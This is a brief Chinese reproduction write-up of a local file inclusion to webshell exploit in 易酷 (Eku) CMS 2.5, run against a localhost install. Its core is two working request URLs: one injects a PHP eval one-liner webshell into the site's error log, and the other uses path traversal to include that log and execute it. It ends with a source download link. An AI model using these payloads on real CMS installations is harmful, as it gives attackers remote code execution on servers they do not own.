易酷 cms2.5 本地文件包含漏洞 getshell

易酷 cms2.5  本地文件包含漏洞 getshell

首先下载源码安装（http://127.0.0.1/test/ekucms2.5/install.php）

 安装成功直接进行复现吧

本地包含一句话木马

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}

 

 

会在网站的/temp/Logs/目录下生成一个错误日志，命名规则为年_月_日

错误日志内容

 

进行包含错误日志，地址：

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log

 

 

验证下：

 

 

源码链接（链接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密码: 3y48）